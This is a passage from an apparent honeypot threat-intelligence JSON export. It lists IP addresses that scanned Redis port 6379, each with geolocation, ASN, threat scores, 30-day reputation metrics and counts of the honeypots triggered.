      "last_seen": "2026-03-07T03:37:29.365Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Clifton",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 13.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.2
      },
      "reputation_metrics": {
        "total_events_30d": 1890,
        "days_active_30d": 2,
        "ports_targeted_30d": 1903,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-06T13:55:04.734000+00:00",
        "last_seen_30d": "2026-03-07T03:45:33.129000+00:00",
        "days_since_last_seen": 24
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1871,
        "Honeytrap": 18,
        "Sentrypeer": 1
      }
    },
    "167.99.0.28": {
      "attack_count": 4,
      "first_seen": "2026-03-23T10:47:24.000Z",
      "last_seen": "2026-03-23T10:48:28.210Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 48.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 1919,
        "days_active_30d": 1,
        "ports_targeted_30d": 1876,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-23T09:05:41.884000+00:00",
        "last_seen_30d": "2026-03-23T11:01:47.478000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1853,
        "Honeytrap": 65,
        "ConPot": 1
      }
    },
    "193.3.53.4": {
      "attack_count": 4,
      "first_seen": "2026-03-20T05:44:45.000Z",
      "last_seen": "2026-03-20T05:45:50.204Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 211607,
      "as_org": "Securitytrails, LLC",
      "threat_score": 50.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.1,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.83
      },
      "reputation_metrics": {
        "total_events_30d": 26,
        "days_active_30d": 25,
        "ports_targeted_30d": 26,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T03:41:15.555000+00:00",
        "last_seen_30d": "2026-03-26T09:31:10.736000+00:00",
        "days_since_last_seen": 5
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26
      }
    },
    "64.62.156.28": {
      "attack_count": 4,
      "first_seen": "2026-03-11T13:25:32.000Z",
      "last_seen": "2026-03-11T13:26:39.008Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Minneapolis",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 76.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 15.1,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 32,
        "days_active_30d": 29,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T03:48:00.645000+00:00",
        "last_seen_30d": "2026-03-30T12:36:54.264000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 26,
        "Honeytrap": 3,
        "ConPot": 2,
        "Honeyaml": 1
      }
    },
    "65.49.20.78": {
      "attack_count": 4,
      "first_seen": "2026-03-12T13:21:08.000Z",
      "last_seen": "2026-03-12T13:22:09.270Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 59.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.8,
        "persistence": 22.5,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 15,
        "days_active_30d": 27,
        "ports_targeted_30d": 14,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T09:17:59.944000+00:00",
        "last_seen_30d": "2026-03-31T10:24:11.897000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15
      }
    },
    "65.49.20.95": {
      "attack_count": 4,
      "first_seen": "2026-03-08T14:08:31.000Z",
      "last_seen": "2026-03-08T14:09:36.555Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 62.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 11.5,
        "persistence": 23.3,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 28,
        "ports_targeted_30d": 12,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T07:42:57.292000+00:00",
        "last_seen_30d": "2026-03-30T11:14:51.831000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13,
        "Honeytrap": 1
      }
    },
    "71.6.233.159": {
      "attack_count": 4,
      "first_seen": "2026-03-03T08:54:59.000Z",
      "last_seen": "2026-03-03T08:56:06.648Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 10439,
      "as_org": "CariNet, Inc.",
      "threat_score": 0.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T08:56:06.648000+00:00",
        "last_seen_30d": "2026-03-03T08:56:06.648000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "74.82.47.62": {
      "attack_count": 4,
      "first_seen": "2026-03-31T12:04:51.000Z",
      "last_seen": "2026-03-31T12:05:51.951Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Gunnison",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 68.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 13.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 30,
        "ports_targeted_30d": 15,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T07:34:45.071000+00:00",
        "last_seen_30d": "2026-03-31T12:05:51.951000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21,
        "Honeytrap": 3
      }
    },
    "106.12.184.7": {
      "attack_count": 71,
      "first_seen": "2026-03-02T01:09:40.000Z",
      "last_seen": "2026-03-27T14:32:49.837Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 52.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 21.7,
        "diversity": 4,
        "spread": 5,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 1075,
        "days_active_30d": 26,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:00:25.962000+00:00",
        "last_seen_30d": "2026-03-27T14:32:49.837000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1075
      }
    },
    "106.13.124.241": {
      "attack_count": 68,
      "first_seen": "2026-03-05T17:21:32.000Z",
      "last_seen": "2026-03-31T13:07:25.054Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 38365,
      "as_org": "Beijing Baidu Netcom Science and Technology Co., Ltd.",
      "threat_score": 40.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.1,
        "persistence": 22.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 27,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T17:22:34.409000+00:00",
        "last_seen_30d": "2026-03-31T13:07:25.054000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13
      }
    },
    "106.225.133.217": {
      "attack_count": 67,
      "first_seen": "2026-03-03T09:05:45.000Z",
      "last_seen": "2026-03-31T02:58:18.665Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 134238,
      "as_org": "CHINANET Jiangx province IDC network",
      "threat_score": 42.3,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.1,
        "persistence": 24.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 13,
        "days_active_30d": 29,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T09:06:55.538000+00:00",
        "last_seen_30d": "2026-03-31T02:58:18.665000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 13
      }
    },
    "61.153.23.162": {
      "attack_count": 61,
      "first_seen": "2026-03-04T09:42:30.000Z",
      "last_seen": "2026-03-30T03:04:06.308Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 38.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 22.5,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 27,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T09:43:34.130000+00:00",
        "last_seen_30d": "2026-03-30T03:04:06.308000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12
      }
    },
    "43.134.0.85": {
      "attack_count": 57,
      "first_seen": "2026-03-06T15:54:04.000Z",
      "last_seen": "2026-03-28T09:34:54.945Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Singapore",
      "country_code": "SG",
      "city": "Singapore",
      "asn": 132203,
      "as_org": "Tencent Building, Kejizhongyi Avenue",
      "threat_score": 40.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 19.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 23,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-06T15:54:04+00:00",
        "last_seen_30d": "2026-03-28T09:34:54.945000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "157.245.229.234": {
      "attack_count": 56,
      "first_seen": "2026-03-03T21:04:13.000Z",
      "last_seen": "2026-03-27T11:50:32.669Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 40.4,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.8,
        "persistence": 20.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 24,
        "days_active_30d": 25,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T21:04:13+00:00",
        "last_seen_30d": "2026-03-27T11:50:32.669000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 18,
        "Suricata": 6
      }
    },
    "94.102.49.155": {
      "attack_count": 55,
      "first_seen": "2026-03-09T18:03:12.000Z",
      "last_seen": "2026-03-21T12:49:13.003Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "Amsterdam",
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 95.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.8,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 380,
        "days_active_30d": 30,
        "ports_targeted_30d": 13,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-02T07:39:19.610000+00:00",
        "last_seen_30d": "2026-03-31T22:29:37.797000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 251,
        "Honeytrap": 52,
        "ElasticPot": 23,
        "Cowrie": 20,
        "Redishoneypot": 18,
        "Dionaea": 12,
        "Honeyaml": 4
      }
    },
    "142.93.209.215": {
      "attack_count": 42,
      "first_seen": "2026-03-04T19:25:37.000Z",
      "last_seen": "2026-03-28T16:45:43.781Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Bengaluru",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 40.6,
      "threat_level": "medium",
      "score_components": {
        "frequency": 12.3,
        "persistence": 20.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 25,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-04T19:25:37+00:00",
        "last_seen_30d": "2026-03-28T16:45:43.781000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 5
      }
    },
    "220.248.173.137": {
      "attack_count": 38,
      "first_seen": "2026-03-05T23:56:21.000Z",
      "last_seen": "2026-03-30T21:06:31.805Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4837,
      "as_org": "CHINA UNICOM China169 Backbone",
      "threat_score": 54.9,
      "threat_level": "medium",
      "score_components": {
        "frequency": 14.1,
        "persistence": 21.7,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 26,
        "days_active_30d": 26,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-05T23:56:21+00:00",
        "last_seen_30d": "2026-03-30T21:06:31.805000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 12,
        "Suricata": 12,
        "Honeytrap": 2
      }
    },
    "80.82.70.133": {
      "attack_count": 38,
      "first_seen": "2026-03-09T18:03:01.000Z",
      "last_seen": "2026-03-21T12:48:50.099Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": null,
      "asn": 202425,
      "as_org": "IP Volume inc",
      "threat_score": 93.9,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.9,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 243,
        "days_active_30d": 30,
        "ports_targeted_30d": 16,
        "honeypots_triggered_30d": 8,
        "first_seen_30d": "2026-03-02T07:15:54.276000+00:00",
        "last_seen_30d": "2026-03-31T22:29:18.936000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 184,
        "Honeytrap": 26,
        "Dionaea": 9,
        "Redishoneypot": 9,
        "Cowrie": 8,
        "ElasticPot": 3,
        "Honeyaml": 2,
        "Tanner": 2
      }
    },
    "117.72.186.146": {
      "attack_count": 37,
      "first_seen": "2026-03-03T03:04:17.000Z",
      "last_seen": "2026-03-30T06:02:05.349Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 141679,
      "as_org": "China Telecom Beijing Tianjin Hebei Big Data Industry Park Branch",
      "threat_score": 37.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 23.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 28,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T03:05:19.504000+00:00",
        "last_seen_30d": "2026-03-30T06:02:05.349000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "158.173.152.244": {
      "attack_count": 37,
      "first_seen": "2026-03-16T23:21:26.000Z",
      "last_seen": "2026-03-18T17:43:47.101Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Switzerland",
      "country_code": "CH",
      "city": "Zurich",
      "asn": 212238,
      "as_org": "Datacamp Limited",
      "threat_score": 36.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 19.3,
        "persistence": 2.5,
        "diversity": 18,
        "spread": 25,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 86,
        "days_active_30d": 3,
        "ports_targeted_30d": 9,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-16T23:21:21+00:00",
        "last_seen_30d": "2026-03-18T17:44:05.023000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 50,
        "Honeytrap": 18,
        "Redishoneypot": 12,
        "ElasticPot": 4,
        "Dionaea": 2
      }
    },
    "125.94.106.113": {
      "attack_count": 36,
      "first_seen": "2026-03-04T21:35:02.000Z",
      "last_seen": "2026-03-29T19:28:01.783Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Jiaxing",
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 34.6,
      "threat_level": "low",
      "score_components": {
        "frequency": 8.5,
        "persistence": 21.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 26,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-04T21:36:04.991000+00:00",
        "last_seen_30d": "2026-03-29T19:28:01.783000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7
      }
    },
    "119.146.94.93": {
      "attack_count": 34,
      "first_seen": "2026-03-10T20:18:59.000Z",
      "last_seen": "2026-03-10T20:21:18.130Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 8.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 14.6,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 29,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-10T20:18:59+00:00",
        "last_seen_30d": "2026-03-10T20:21:18.130000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 28,
        "Suricata": 1
      }
    },
    "14.116.219.149": {
      "attack_count": 33,
      "first_seen": "2026-03-07T21:11:40.000Z",
      "last_seen": "2026-03-30T21:24:11.064Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 58466,
      "as_org": "CHINANET Guangdong province network",
      "threat_score": 52.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 13.6,
        "persistence": 20.0,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 23,
        "days_active_30d": 24,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-07T21:11:40+00:00",
        "last_seen_30d": "2026-03-30T21:24:11.064000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 12,
        "Redishoneypot": 9,
        "Honeytrap": 2
      }
    },
    "150.158.97.56": {
      "attack_count": 32,
      "first_seen": "2026-03-05T10:49:57.000Z",
      "last_seen": "2026-03-28T05:44:06.558Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 31.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.8,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-05T10:51:07.666000+00:00",
        "last_seen_30d": "2026-03-28T05:44:06.558000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6
      }
    },
    "121.237.180.162": {
      "attack_count": 31,
      "first_seen": "2026-03-16T20:28:50.000Z",
      "last_seen": "2026-03-17T10:31:03.287Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 146966,
      "as_org": "China Telecom",
      "threat_score": 8.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.8,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-16T20:29:53.942000+00:00",
        "last_seen_30d": "2026-03-17T10:31:03.287000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6
      }
    },
    "45.43.14.119": {
      "attack_count": 30,
      "first_seen": "2026-03-11T04:54:19.000Z",
      "last_seen": "2026-03-11T05:38:34.061Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Bend",
      "asn": 397423,
      "as_org": "Tier.Net Technologies LLC",
      "threat_score": 8.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 12.6,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 18,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-11T04:54:19+00:00",
        "last_seen_30d": "2026-03-11T05:38:34.061000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 15,
        "Suricata": 3
      }
    },
    "183.56.219.190": {
      "attack_count": 28,
      "first_seen": "2026-03-07T00:18:46.000Z",
      "last_seen": "2026-03-21T15:29:42.298Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Guangzhou",
      "asn": 135089,
      "as_org": "China Telecom",
      "threat_score": 23.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.8,
        "persistence": 12.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 15,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-07T00:18:46+00:00",
        "last_seen_30d": "2026-03-21T15:29:42.298000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "52.185.213.71": {
      "attack_count": 28,
      "first_seen": "2026-03-02T00:20:04.000Z",
      "last_seen": "2026-03-10T12:03:27.039Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 9.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.8,
        "persistence": 7.5,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 12,
        "days_active_30d": 9,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T00:20:05+00:00",
        "last_seen_30d": "2026-03-10T12:03:27.039000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 9,
        "Suricata": 3
      }
    },
    "66.132.172.16": {
      "attack_count": 28,
      "first_seen": "2026-03-25T08:34:54.000Z",
      "last_seen": "2026-03-29T17:08:08.928Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 65.8,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 2029,
        "days_active_30d": 13,
        "ports_targeted_30d": 1369,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-19T18:42:49.062000+00:00",
        "last_seen_30d": "2026-03-31T23:51:42.136000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 2029
      }
    },
    "184.105.247.196": {
      "attack_count": 27,
      "first_seen": "2026-03-14T09:40:51.000Z",
      "last_seen": "2026-03-14T09:42:43.778Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Shawnee",
      "asn": 6939,
      "as_org": "Hurricane Electric LLC",
      "threat_score": 95.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 25.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 332,
        "days_active_30d": 30,
        "ports_targeted_30d": 64,
        "honeypots_triggered_30d": 9,
        "first_seen_30d": "2026-03-02T03:58:06+00:00",
        "last_seen_30d": "2026-03-31T14:23:40.206000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 209,
        "Honeytrap": 82,
        "Redishoneypot": 11,
        "Ciscoasa": 10,
        "Cowrie": 6,
        "Dionaea": 6,
        "CitrixHoneypot": 3,
        "ElasticPot": 3,
        "Honeyaml": 2
      }
    },
    "185.207.65.7": {
      "attack_count": 26,
      "first_seen": "2026-03-12T11:34:18.000Z",
      "last_seen": "2026-03-28T13:20:11.167Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": "Moscow",
      "asn": 9123,
      "as_org": "Jsc timeweb",
      "threat_score": 25.3,
      "threat_level": "low",
      "score_components": {
        "frequency": 7.0,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 5,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-12T11:35:28.365000+00:00",
        "last_seen_30d": "2026-03-28T13:20:11.167000+00:00",
